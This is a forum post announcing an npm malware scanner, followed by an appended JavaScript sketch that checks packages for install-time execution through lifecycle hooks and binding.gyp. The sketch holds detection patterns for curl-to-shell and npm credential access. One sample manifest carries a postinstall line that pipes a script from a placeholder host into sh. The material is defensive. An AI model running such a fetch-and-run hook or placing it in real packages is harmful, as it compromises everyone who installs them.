Hey guys,
With the recent wave of npm supply-chain attacks (typosquatting, maintainer takeovers, hidden execution in binding.gyp, etc.), I built a focused scanner: https://npmscan.com
What it catches:
- Heavy obfuscation / packer patterns
- Suspicious postinstall / preinstall hooks
- Drainers & credential exfil
- Known malicious indicators + heuristics (claims 99.8% on their dataset)
Scanned ~2.5M packages so far. Free to use, no login required for basic scans.
Example of recent catches: http://npmscan.com/latest-vulnerabilities/
Feedback welcome — especially from people who deal with malware dev / red teaming on the JS side. What evasion techniques should I improve detection for?
GitHub / more details on the site.
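
A sketch of a check for the install-time vectors named in the post (preinstall/postinstall hooks and `binding.gyp`). This is an added example, not npmscan's code and not part of the original post; the function name, the pattern list and the sample packages are constructed assumptions.

```javascript
// Flags code that npm would run automatically during `npm install`.
// Inputs are in-memory so this runs offline: the parsed package.json
// and the list of file paths found in the package tarball.

// Lifecycle scripts npm runs for a dependency at install time.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Constructed heuristics (assumptions): command shapes worth a human look.
const RISKY_PATTERNS = [
  { name: "download-piped-to-shell", re: /\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b/i },
  { name: "inline-node-eval", re: /\bnode\s+(-e|--eval)\b/i },
  { name: "base64-decode", re: /\bbase64\s+(-d|--decode)\b|Buffer\.from\([^)]*base64/i },
  { name: "touches-npm-credentials", re: /\.npmrc|NPM_TOKEN/i },
];

function auditInstallTimeExecution(manifest, files) {
  const findings = [];
  const scripts =
    manifest && typeof manifest.scripts === "object" && manifest.scripts ? manifest.scripts : {};

  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string" || cmd.trim() === "") continue;
    const reasons = RISKY_PATTERNS.filter((p) => p.re.test(cmd)).map((p) => p.name);
    findings.push({ vector: hook, command: cmd, severity: reasons.length ? "high" : "review", reasons });
  }

  // With a binding.gyp in the package root and no install/preinstall script,
  // npm defaults the install command to `node-gyp rebuild`, so the gyp file
  // is evaluated although package.json declares no hook at all.
  const rootGyp = files.some((f) => f.replace(/^package\//, "") === "binding.gyp");
  if (rootGyp && !scripts.install && !scripts.preinstall) {
    findings.push({ vector: "implicit-node-gyp", command: "node-gyp rebuild",
      severity: "review", reasons: ["binding.gyp-without-install-script"] });
  }
  return findings;
}

// Constructed sample packages (not real packages).
const SAMPLE_HOOK = { name: "constructed-a", scripts: {
  postinstall: "curl -s https://example.invalid/x.sh | sh", test: "node test.js" } };
const SAMPLE_GYP = { name: "constructed-b", scripts: { test: "node test.js" } };

console.log(auditInstallTimeExecution(SAMPLE_HOOK, ["package/package.json", "package/index.js"]));
console.log(auditInstallTimeExecution(SAMPLE_GYP, ["package/package.json", "package/binding.gyp"]));
```

A finding with severity `review` only means code runs at install time; plenty of legitimate native addons land there, so it is a triage signal rather than a verdict.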
